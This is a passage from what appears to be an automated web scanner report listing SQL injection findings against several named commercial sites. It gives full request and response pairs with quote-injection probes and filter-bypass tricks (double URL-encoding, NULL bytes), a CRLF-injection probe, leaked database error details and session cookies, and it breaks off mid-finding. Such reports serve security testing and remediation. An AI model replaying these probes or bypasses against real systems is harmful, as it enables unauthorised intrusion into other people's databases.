Vary: Accept-Encoding
Date: Fri, 06 May 2011 19:58:07 GMT
Connection: close
Akamai: True

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
2.4. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01 [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://clk.atdmt.com
Path:   /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01

Issue detail

The gclid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gclid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gclid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA%2527 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e:a6ff/1ca6a:e29b/1c5b3:11d81/27298:de5a/4e97; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3:7162b37/1ca6a/96559b2/a6ff/4dbeeff6:c6fbf53/1c5b3/1235eb22/e29b/4dbef4f2:ae669bf/27298/ffed956/11d81/4dbef65d:80cc648/4e97/af0b901/de5a/4dbf541a; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=4Z4hoC0UMdOLFTOoUFdt8MycOkKr26b778UQ7Rv4sDujYgzPjPTdfw&W=1

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 07 May 2011 01:22:51 GMT
Connection: close
Content-Length: 326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Service Unavailable</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=u
...[SNIP]...
<p>HTTP Error 503. The service is unavailable.</p>
...[SNIP]...

Request 2

GET /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA%2527%2527 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e:a6ff/1ca6a:e29b/1c5b3:11d81/27298:de5a/4e97; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3:7162b37/1ca6a/96559b2/a6ff/4dbeeff6:c6fbf53/1c5b3/1235eb22/e29b/4dbef4f2:ae669bf/27298/ffed956/11d81/4dbef65d:80cc648/4e97/af0b901/de5a/4dbf541a; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=4Z4hoC0UMdOLFTOoUFdt8MycOkKr26b778UQ7Rv4sDujYgzPjPTdfw&W=1

Response 2

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA%2527%2527
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e:a6ff/1ca6a:e29b/1c5b3:11d81/27298:de5a/4e97:903d/294e3; expires=Monday, 06-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3:7162b37/1ca6a/96559b2/a6ff/4dbeeff6:c6fbf53/1c5b3/1235eb22/e29b/4dbef4f2:ae669bf/27298/ffed956/11d81/4dbef65d:80cc648/4e97/af0b901/de5a/4dbf541a:c4717d7/294e3/12504287/903d/4dc49eec; expires=Monday, 06-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sat, 07 May 2011 01:22:52 GMT
Connection: close

2.5. http://dce.sapha.com/engine.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ac parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /engine.php?ac=1' HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/company/about-sapha
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /engine.php?ac=1'' HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/company/about-sapha
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: sapha_tst_1''=TRUE; expires=Mon, 03-May-2021 22:06:44 GMT; path=/; domain=.sapha.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/x-javascript
Content-Length: 5603

var SCS_tid=(SCS_tid)?escape(SCS_tid):"",NS_do=new Array('conversionsuite.com','sapha.com'),NS_fe=new Array('exe','pdf','zip','wav','mp3','mov','mpg','avi','wmv','doc','xls','wpd','ppt','swf','mpeg','
...[SNIP]...
2.6. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /engine.php?ac=/1'2546 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dce.sapha.com

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 391

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '/1'2546'<br>
<b>MySQ
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2546'' at line 1)<br>
...[SNIP]...

Request 2

GET /engine.php?ac=/1''2546 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dce.sapha.com

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

2.7. http://dce.sapha.com/logging.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ac parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /logging.php?ac=1'&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /logging.php?ac=1''&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 2

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:05:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

2.8. https://events.gsmiweb.com/subscribe.php [event_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The event_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the event_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /subscribe.php?event_id=82' HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/events.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:39:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 309
Connection: close
Content-Type: text/html


<script language="javascript">
window.location.href="events.php";
</script>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND
        type = 1 AND active = 1
        ORDER BY `order` ASC, price_id ASC' at line 3
2.9. https://events.gsmiweb.com/subscribe.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /subscribe.php?event_i/1'd=82 HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/events.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:40:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 307
Connection: close
Content-Type: text/html


<script language="javascript">
window.location.href="events.php";
</script>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND
        type = 1 AND active = 1
        ORDER BY `order` ASC, price_id ASC' at line 3
2.10. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/G.9p2/s96203847790602

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/expedia1/1/G.9p2/s96203847790602?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A9%205%20300&ce=ISO-8859-1&cdp=2&pageName=50053&g=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&c16=Head%3ANav%3AHotels%3AHotels&v28=Head%3ANav%3AHotels%3AHotels&pe=lnk_o&pev1=http%3A//www.expedia.com/Hotels&pev2=RFRR%20Action%20Link&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:04:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 393
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/expedia1/1/G.9p2/s96203847790602?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A9%205%20300&ce=ISO-8859-1&cdp=2&pageName=50053&g=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&c16=Head%3ANav%3AHotels%3AHotels&v28=Head%3ANav%3AHotels%3AHotels&pe=lnk_o&pev1=http%3A//www.expedia.com/Hotels&pev2=RFRR%20Action%20Link&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:04:36 GMT
Server: Omniture DC/2.0.0
xserver: www611
Content-Length: 0
Content-Type: text/html

2.11. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

